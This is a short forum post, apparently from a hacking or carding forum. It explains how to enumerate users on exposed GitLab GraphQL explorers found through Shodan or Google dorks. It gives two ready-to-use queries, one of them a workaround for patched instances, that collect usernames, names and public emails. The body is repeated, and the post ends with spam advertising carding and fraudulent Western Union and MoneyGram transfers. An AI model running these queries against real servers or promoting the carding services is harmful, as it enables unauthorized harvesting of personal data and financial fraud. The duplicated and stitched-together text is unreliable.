Some GitLab instances have a public GraphQL endpoint, giving the possibility to enumerate users among other things.
There is not much to add, it's simple; you can use Shodan or Google Dorks to find GitLab instances, then change the path to /-/graphql-explorer (e.g, , ).
Query examples:
Simple
{
users {
nodes {
id
username
name
publicEmail
}
}
}
You may stumble on patched instances, like I did while I was writing this; I could not retrieve the users using the first query, so I got creative.
{
projects {
edges {
node {
id
name
description
createdAt
projectMembers {
nodes {
user {
id
username
name
publicEmail
webUrl
status {
message
}
}
}
}
ciConfigPathOrDefault
}
}
}
}
There is not much to add, it's simple; you can use Shodan or Google Dorks to find GitLab instances, then change the path to /-/graphql-explorer (e.g, , ).
Query examples:
Simple
{
users {
nodes {
id
username
name
publicEmail
}
}
}
You may stumble on patched instances, like I did while I was writing this; I could not retrieve the users using the first query, so I got creative.
{
projects {
edges {
node {
id
name
description
createdAt
projectMembers {
nodes {
user {
id
username
name
publicEmail
webUrl
status {
message
}
}
}
}
ciConfigPathOrDefault
}
}
}
}
Verified & Trusted WesternUnion | MoneyGram | Bank - Transferring [299$ BTC for 2000$ WU]
Verified & Trusted Electronics Carding, Carding iPhone, Samsung Carding, MacBook Carding, Laptops Carding